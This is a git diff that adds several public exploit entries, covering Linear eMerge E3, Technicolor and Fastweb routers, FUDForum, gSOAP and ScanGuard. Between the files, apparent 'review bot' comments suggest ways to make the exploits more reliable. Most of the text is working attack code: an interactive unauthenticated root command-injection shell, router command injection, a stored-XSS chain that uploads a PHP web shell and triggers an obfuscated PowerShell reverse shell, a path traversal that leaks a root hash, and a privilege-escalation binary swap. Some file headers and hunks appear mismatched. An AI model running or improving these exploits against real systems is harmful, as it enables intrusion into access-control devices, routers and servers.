diff --git a/exploits/hardware/webapps/47649.py b/exploits/hardware/webapps/47649.py
new file mode 100755
index 000000000..05676fdd0
--- /dev/null
+++ b/exploits/hardware/webapps/47649.py
@@ -0,0 +1,116 @@
+# Title: Linear eMerge E3 1.00-06 - Remote Code Execution
+# Author: LiquidWorm
+# Date: 2019-11-13
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Affected version: <=2.3.0a
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# CVE: CVE-2019-7256
+
+#!/usr/bin/env python
+#
+# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
+# Affected version: <=1.00-06
+# via card_scan_decoder.php
+# CVE: CVE-2019-7256
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+#
+# By Gjoko 'LiquidWorm' Krstic
+#
+#########################################################################
+# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
+# Do you want me to try and get the web front-end credentials? (y/n) y
+# ID='admin',Password='MakeLoveNotWar!'
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ id
+# uid=1003(lighttpd) gid=0(root)
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
+# Software Version: 1.00.03
+# Image: nxgcpub-image
+# Built by: jenkins
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
+# Password:
+# uid=0(root) gid=0(root) groups=0(root)
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ exit
+#
+# [+] Erasing read stage file and exiting...
+# [+] Done. Ba-bye!
+#
+#########################################################################
+
+import requests
+import time####
+import sys#####
+import os######
+import re######
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 2:
+ print '''
+ .....
+ .e$$$$$$$$$$$$$$e.
+ z$$ ^$$$$$$$$$$$$$$$$$.
+ .$$$* J$$$$$$$$$$$$$$$$$$$e
+ .$" .$$$$$$$$$$$$$$$$$$$$$$*-
+ .$ $$$$$$$$$$$$$$$$***$$ .ee"
+ z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*"
+ " -\e$$ 4$$$$. .ze$$$""""
+ 4 z$$$$$ $$$$$$$$$$$$$$$$$$$$"
+ $$$$$$$$ .$$$$$$$$$$$**$$$$*"
+ z$$" $$ $$$$P*"" J$*$$c
+ $$" $$F .$$$ $$ ^$$
+ $$ *$$c.z$$$ $$ $$
+ $P $$$$$$$ 4$F 4$
+ dP *$$$" $$ '$r
+ .$ J$" $"
+ $ $P 4$
+ F $$ 4$
+ 4$% 4$
+ $$ 4$
+ d$" $$
+ $P $$
+ $$ $$
+ 4$% $$
+ $$ $$
+ d$ $$
+ $F "3
+ r=4e=" ... ..rf . ""%
+ $**$*"^""=..^4*=4=^"" ^"""
+ '''
+ print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
+ print '\x20\x20[-] by lqwrm (c) 2019'
+ print '\n\x20\x20[*] Usage: '+piton+' \n'
+ sys.exit()
+
+ipaddr = sys.argv[1]
+
+creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
+if creds.strip() == 'y':
+ frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
+ requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60')
+ showme = requests.get('http://'+ipaddr+'/test.txt')
+ print showme.text
+
+while True:
+ try:
+ cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
+ execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60')
+ #time.sleep(1);
+ readreq = requests.get('http://'+ipaddr+'/test.txt')
+ print readreq.text
+ if cmd.strip() == 'exit':
+ print "[+] Erasing read stage file and exiting..."
+ requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
+ print "[+] Done. Ba-bye!\n"
+ break
+ else: continue
+ except Exception:
+ break
+
+sys.exit()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47651.txt b/exploits/hardware/webapps/47651.txt
new file mode 100644
index 000000000..c209a9342
--- /dev/null
+++ b/exploits/hardware/webapps/47651.txt
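Review bot: The request that removes `test.txt` runs only when the operator types `exit`; the `except Exception: break` branch and a Ctrl-C (KeyboardInterrupt is not an `Exception`) leave the staged command output — including the credentials dumped by the `frontend` branch — readable by anyone at `http://TARGET/test.txt`. Wrapping the loop in `try:/finally:` and moving the `rm test.txt` request into the `finally` makes the cleanup unconditional. `cmd` is also concatenated into the query string unencoded, so a command containing `&`, `#` or `%` is cut or mangled by the server's query parsing; `import urllib` and `urllib.quote(cmd, safe='')` (the file is Python 2 — `print` statements, `raw_input`) fixes that. The two headers disagree on the affected version (`<=2.3.0a` in the first block, `<=1.00-06` in the author's block and the title); the first should be corrected to match.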
@@ -0,0 +1,24 @@
+# Exploit Title: Technicolor TD5130.2 - Remote Command Execution
+# Date: 2019-11-12
+# Exploit Author: João Teles
+# Vendor Homepage: https://www.technicolor.com/
+# Version: TD5130v2
+# Firmware Version: OI_Fw_V20
+# CVE : CVE-2019-18396
+
+---------------------------
+
+POST /mnt_ping.cgi HTTP/1.1
+Host: HOST
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http:/HOST/mnt_ping.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 53
+Cookie: session=COOKIE
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+isSubmit=1&addrType=3&pingAddr=;ls&send=Send
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47652.py b/exploits/hardware/webapps/47652.py
new file mode 100755
index 000000000..92593a82c
--- /dev/null
+++ b/exploits/hardware/webapps/47652.py
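Review bot: `Content-Length: 53` does not match the body as shown — `isSubmit=1&addrType=3&pingAddr=;ls&send=Send` is 44 bytes — so a verbatim replay either stalls waiting for more bytes or is rejected; recompute it (or omit it and let the client set it) so the PoC works as pasted, unless part of the body was lost on export. The request carries `Cookie: session=COOKIE`, so this is post-authentication command injection, which the header should state, e.g. `# Authentication: required (web UI session cookie)`. `Referer: http:/HOST/mnt_ping.cgi` has a single slash; harmless unless the CGI validates Referer, but worth correcting. No response is shown, so whether the `ls` output is reflected in the page or the injection is blind is not demonstrated.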
@@ -0,0 +1,89 @@
+# Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: Luis Stefan
+# Vendor Homepage: https://www.technicolor.com/
+# Software Link: N/A
+# Version: TC7300.B0 - STFA.51.20
+# Tested on: macOS Mojave and Catalina
+# CVE :
+
+#!/usr/bin/env python3
+__author__ = "Luis Stefan"
+__license__ = "MIT"
+__version__ = "1.0"
+__email__ = "luis.ss@protonmail.com"
+__description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device."""
+
+from enum import IntEnum
+from scapy.all import *
+import codecs, threading, time
+
+# Define your network interface
+interface = 'en0'
+# Insert your interface card mac address
+mac = 'xx:xx:xx:xx:xx:xx'
+broadcast = 'ff:ff:ff:ff:ff:ff'
+mac_hxd = codecs.decode(mac.replace(':', ''),'hex')
+
+class Bootp(IntEnum):
+ Discover = 1
+ Offer = 2
+ Request = 3
+ Decline = 4
+ Ack = 5
+ Nak = 6
+ Release = 7
+
+def dhcp_discover():
+ disc_pkt = Ether(src=mac, dst=broadcast) / \
+ IP(src='0.0.0.0', dst='255.255.255.255') / \
+ UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
+ DHCP(options=[('message-type', 'discover'), 'end'])
+ sendp(disc_pkt, iface=interface)
+
+def dhcp_request(pkt):
+ yraddr = pkt['BOOTP'].yraddr
+ # gwaddr == Gateway Ip Address
+ gwaddr = '192.168.0.1'
+ param_req_list = []
+ hostname = ""
+ req_pkt = Ether(src=mac, dst=broadcast) / \
+ IP(src='0.0.0.0', dst='255.255.255.255') / \
+ UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
+ DHCP(options=[('message-type', 'request'), ('server_id', gwaddr),
+ ('requested_addr', yraddr), ('hostname', hostname), 'end'])
+ sendp(req_pkt, iface=interface)
+
+def dhcp(pkt):
+ print(pkt.display())
+ print("#############################################################")
+ if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer:
+ dhcp_request(pkt)
+ elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack:
+ print("Server Acknowledged")
+ sys.exit(0)
+ elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline:
+ print("Server Declined")
+ sys.exit(0)
+ elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak:
+ print("Server Nak")
+ sys.exit(0)
+
+
+def ver_dhcp():
+ print("Verifying DHCP port traffic..")
+ sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20)
+ sys.exit(0)
+
+
+def main():
+ t1 = threading.Thread(target=ver_dhcp, args=())
+ t1.setDaemon = True
+ t1.start()
+ time.sleep(2)
+ dhcp_discover()
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47654.py b/exploits/hardware/webapps/47654.py
new file mode 100755
index 000000000..f454f6a89
--- /dev/null
+++ b/exploits/hardware/webapps/47654.py
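Review bot: `t1.setDaemon = True` in `main()` overwrites the `Thread.setDaemon` method with a boolean instead of calling it, so the sniffer thread is never marked daemon; use `t1.daemon = True`. The `sys.exit(0)` calls in `dhcp()` and `ver_dhcp()` execute on that worker thread, where `SystemExit` only ends the thread, so they do not stop the script as presumably intended, and `sys` is never imported — the script relies on it leaking through `from scapy.all import *`; add `import sys`. `hostname = ""` in `dhcp_request()` is empty in this listing, so the DHCP REQUEST carries no payload at all; if the script-tag payload was stripped on export it needs restoring, with a comment naming the field the router reflects. The header leaves `# CVE :` blank while `__description__` cites CVE-2019-17524; fill the header in.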
@@ -0,0 +1,84 @@
+# Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution
+# Date: 2019-11-13
+# Exploit Author: Riccardo Gasparini
+# Vendor Homepage: https://www.fastweb.it/
+# Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network)
+# Version: 0.00.81
+# Tested on: Linux
+# CVE : N/A
+
+import requests, json, time, sys
+
+current_milli_time = lambda: int(round(time.time() * 1000))
+
+password='XXXXXXXXXXXXXXX'
+
+if password == 'XXXXXXXXXXXXXXX':
+ print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password")
+ sys.exit(-1)
+
+#get XSRF-TOKEN
+headers = {
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
+ 'Referer': 'http://192.168.1.254/tr069',
+}
+params = ()
+response = requests.get('http://192.168.1.254', headers=headers)
+
+#login request and get sessionKey
+xsrfToken=response.cookies['XSRF-TOKEN']
+cookies = {
+ 'XSRF-TOKEN': xsrfToken,
+}
+headers = {
+ 'Pragma': 'no-cache',
+ 'X-XSRF-TOKEN': xsrfToken,
+ 'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4',
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
+ 'Accept': 'application/json, text/plain, */*',
+ 'Referer': 'http://192.168.1.254/tr069',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Connection': 'keep-alive',
+ 'Cache-Control': 'no-cache',
+}
+params = (
+ ('_', str(current_milli_time())),
+ ('cmd', '3'),
+ ('nvget', 'login_confirm'),
+ ('password', password),
+ ('remember_me', '1'),
+ ('sessionKey', 'NULL'),
+ ('username', 'admin'),
+)
+
+response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
+
+jsonResponse = json.loads(response.text)
+sessionKey=jsonResponse["login_confirm"]["check_session"]
+
+print("Executing command reboot\n")
+
+#some commands as example are shown below in the mount parameter
+params = (
+ ('_', str(current_milli_time())),
+ ('act','nvset'),
+ ('service','usb_remove'),
+ #Code execution
+ #('mount','&ping -c 10 192.168.1.172&'),
+ #('mount','&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),#to enable SSH
+ ('mount','&reboot&'),
+ ('sessionKey', sessionKey),
+)
+response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
+print(response.text)
+
+#logout
+params = (
+ ('_', str(current_milli_time())),
+ ('cmd', '5'),
+ ('nvget', 'login_confirm'),
+ ('sessionKey', sessionKey),
+)
+
+response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
+print(json.dumps(json.loads(response.text), indent=2))
\ No newline at end of file
diff --git a/exploits/php/webapps/47650.txt b/exploits/php/webapps/47650.txt
new file mode 100644
index 000000000..1874ffca7
--- /dev/null
+++ b/exploits/php/webapps/47650.txt
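Review bot: A wrong `password` is not handled: `sessionKey=jsonResponse["login_confirm"]["check_session"]` raises a bare `KeyError` (and `response.cookies['XSRF-TOKEN']` does the same if the cookie is absent), so the operator gets a traceback instead of a login-failed message; guard it, e.g. `sessionKey = jsonResponse.get("login_confirm", {}).get("check_session")` followed by `if not sessionKey: sys.exit("login failed - check password")`. The target `192.168.1.254` is hard-coded in six URLs; hoisting it into a `TARGET` constant (or `sys.argv[1]`) keeps the PoC usable on other LANs. The exploit is post-authentication — it logs in as `admin` before injecting `&reboot&` into the `mount` parameter — and the header (title `Remote Code Execution`, `CVE : N/A`) should state that the admin password is required. The unused `params = ()` before the first request can be dropped.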
@@ -0,0 +1,103 @@
+# Exploit Title : FUDForum 3.0.9 - Remote Code Execution
+# Date: 2019-10-26
+# Exploit Author: liquidsky (JMcPeters)
+# Vulnerable Software: FUDForum 3.0.9
+# Vendor Homepage: https://sourceforge.net/projects/fudforum/
+# Version: 3.0.9
+# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
+# Tested On: Windows / mysql / apache
+# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE
+# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
+# CVE: CVE-2019-18873
+
+
+// Greetz : wetw0rk, Fr13ndz, offsec =)
+//
+// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
+// The areas impacted are the admin panel and the forum.
+//
+// XSS via username in Forum:
+// 1. Register an account and log in to the forum.
+// 2. Go to the user control panel. -> Account Settings -> change login
+// 3. Insert javascript payload
+// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
+//
+// XSS via user-agent in Admin Panel:
+// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
+// 2. Send the XSS payload below (from an IP associated with an account) / host the script:
+// 3. curl -A '' http://target.machine/fudforum/index.php
+// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
+//
+
+function patience()
+{
+ var u=setTimeout("grabShell()",5000);
+}
+
+// This function is to call the reverse shell php script (liquidsky.php).
+// currently using a powershell payload that will need to be modified.
+function grabShell() +{ + var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51
%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%4
1%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41"; + xhr = new XMLHttpRequest(); + xhr.open("GET", url, true); + xhr.send(null); + +} + +function submitFormWithTokenJS(token) { + var xhr = new XMLHttpRequest(); + xhr.open("POST", '/fudforum/adm/admbrowse.php', true); + + // Send the proper header information along with the request + xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853"); + + var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory + var fileName = "liquidsky.php"; + var url = "/fudforum/adm/admbrowse.php"; + var ctype = "application/x-php"; + var fileData = "'; $cmd = ($_REQUEST['cmd']); system($cmd); echo ''; die; }?>"; + var boundary = "-----------------------------9703186584101745941654835853"; + var fileSize = fileData.length; + + var body = "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="cur"\r\n\r\n'; + body += currentdir + "\r\n"; + body += "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n'; + body += token + "\r\n"; + body += "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n'; + body += "Content-Type: " + ctype + "\r\n\r\n"; + body += fileData + "\r\n\r\n"; + body += "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n'; + body += "1" + "\r\n"; + body += "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n'; + body += fileName + "\r\n"; + body += "--" + boundary + "\r\n"; + body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n'; + body += "Upload File" + '\r\n'; + body += "--" + boundary + "--"; + + xhr.send(body); +} + +//Grab SQ token +var req = new XMLHttpRequest(); + +req.onreadystatechange=function() 
+{ + if (req.readyState == 4 && req.status == 200) { + var htmlPage = req.responseXML; /* fetch html */ + var SQ = htmlPage.getElementsByTagName("input")[0] + submitFormWithTokenJS(SQ.value); + } +} + +req.open("GET", "/fudforum/adm/admuser.php", true); +req.responseType = "document"; +req.send(); + +patience(); \ No newline at end of file diff --git a/exploits/php/webapps/47653.txt b/exploits/php/webapps/47653.txt new file mode 100644 index 000000000..1454f551f --- /dev/null +++ b/exploits/php/webapps/47653.txt @@ -0,0 +1,27 @@ +# Title: gSOAP 2.8 - Directory Traversal +# Author: Numan Türle +# Date: 2019-11-13 +# Vendor Homepage: https://www.genivia.com/ +# Version : gSOAP 2.8 +# Software Link : https://www.genivia.com/products.html#gsoap + + +POC +--------- + +GET /../../../../../../../../../etc/passwd HTTP/1.1 +Host: 10.200.106.101 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close + +Response +--------- +HTTP/1.1 200 OK +Server: gSOAP/2.8 +Content-Type: application/octet-stream +Content-Length: 51 +Connection: close + +root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh \ No newline at end of file diff --git a/exploits/windows/local/47656.txt b/exploits/windows/local/47656.txt new file mode 100644 index 000000000..46a2a55c6 --- /dev/null +++ b/exploits/windows/local/47656.txt 
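Review bot: The uploaded payload in `submitFormWithTokenJS` — `fileData = "'; $cmd = ($_REQUEST['cmd']); system($cmd); echo ''; die; }?>"` — is not a valid PHP file as listed (it starts mid-string, closes a brace that was never opened and has no PHP open tag), so the tag-like parts were very likely stripped on export; the payload should be restored and a comment should say what it is meant to be. As written the dropped `liquidsky.php` executes any `cmd` from `$_REQUEST` with no authentication, leaving the target open to anyone who finds the file; the PoC should note that and remove the shell after use. `Content-Type: multipart/form-data, boundary=...` uses a comma where RFC 2046 requires a semicolon (`multipart/form-data; boundary=...`); whether PHP's multipart parser tolerates the comma is not shown here. `htmlPage.getElementsByTagName("input")[0]` assumes the SQ token is the first input element on `admuser.php`; selecting it by name (`htmlPage.querySelector('input[name=SQ]')`, if the field is named `SQ` as in the POST body) would survive layout changes. `currentdir` is fixed to `C:/xampp/htdocs/fudforum` and must be edited to the target's webroot.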
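Review bot: The advisory attributes the traversal to "gSOAP 2.8" on the strength of the `Server: gSOAP/2.8` banner, but the `/etc/passwd` returned (a single root user with `/bin/sh`) points to an embedded device, and as far as I recall gSOAP serves plain HTTP GET through an application-supplied handler; the vulnerable product and firmware should be named and the toolkit attribution hedged until the bug is located in gSOAP itself. The request uses literal `..` segments, which browsers and most HTTP libraries normalise away before sending; the PoC should state it must be sent raw (e.g. `curl --path-as-is` or netcat). The response publishes a live root password hash (`$1$$...`, md5-crypt with an empty salt); it should be redacted. The vendor and software links point at Genivia's generic product page rather than a fix or vendor advisory.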
@@ -0,0 +1,160 @@
+# Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions
+# Date: 2019-10-10
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: https://www.scanguard.com/
+# Software Link: https://support.scanguard.com/en/kb/22/upgrades-available
+# Version: 2020
+# Tested on: Windows
+# CVE : N/A
+# Category: exploit
+
+
+SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
+
+[+] Credits: hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+https://www.scanguard.com
+
+
+[Product]
+ScanGuard Antivirus
+ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d
+
+Complete Antivirus & Security Software
+
+
+[Vulnerability Type]
+Insecure Permissions
+
+
+[CVE Reference]
+CVE-2019-18895
+
+
+[Affected Product Code Base]
+ScanGuard Antivirus - latest
+
+
+[Affected Component]
+Permissions on installation directory
+
+
+[Attack Type]
+Local
+
+
+[Impact Code execution]
+true
+
+
+[Impact Escalation of Privileges]
+true
+
+
+[Impact Information Disclosure]
+true
+
+
+[Attack Vectors]
+Low integrity malware or non-privileged user replaces an executable to gain Admin privileges.
+
+
+[Reference]
+https://support.scanguard.com/en/kb/22/upgrades-available
+
+
+[Security Issue]
+Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to
+privilege escalation via a Trojan horse executable file.
+
+The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group.
+This can allow low integrity malware the ability to replace ScanGuard executables.
+ + +C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F + Everyone:(OI)(CI)(ID)F + NT SERVICE\TrustedInstaller:(ID)F + NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F + NT AUTHORITY\SYSTEM:(ID)F + + +[Exploit/POC] + +#include +#include +#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe" +#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf" + +/* ScanGuard EoP + PoC By hyp3rlinx */ + +BOOL PWNED=FALSE; + +BOOL FileExists(LPCTSTR szPath){ + DWORD dwAttrib = GetFileAttributes(szPath); + return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); +} + +void main(void){ + + if(!FileExists(DISABLED_TARGET)){ + rename(TARGET, DISABLED_TARGET); + printf("[+] ScanGuard Antivirus EoP PoC\n"); + Sleep(300); + printf("[+] Disabled ScanGuard.exe ...\n"); + Sleep(300); + }else{ + PWNED=TRUE; + } + + char fname[MAX_PATH]; + char newLoc[]=TARGET; + + DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); + if (size){ + if(!PWNED){ + printf("[+] Copying exploit to vuln dir...\n"); + Sleep(300); + CopyFile(fname, newLoc, FALSE); + printf("[+] Replaced legit ScanGuard...\n"); + Sleep(300); + printf("[+] Done!\n"); + Sleep(300); + MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk"); + Sleep(2000); + exit(0); + }else{ + if(FileExists("ScamGuard.lnk")){ + system("DEL /f ScamGuard.lnk"); + } + printf("[+] ScamGuard PWNED!!!"); + printf("[+] By hyp3rlinx\n"); + system("pause"); + } + } +} + + +[Disclosure Timeline] +Vendor Notification: September 16, 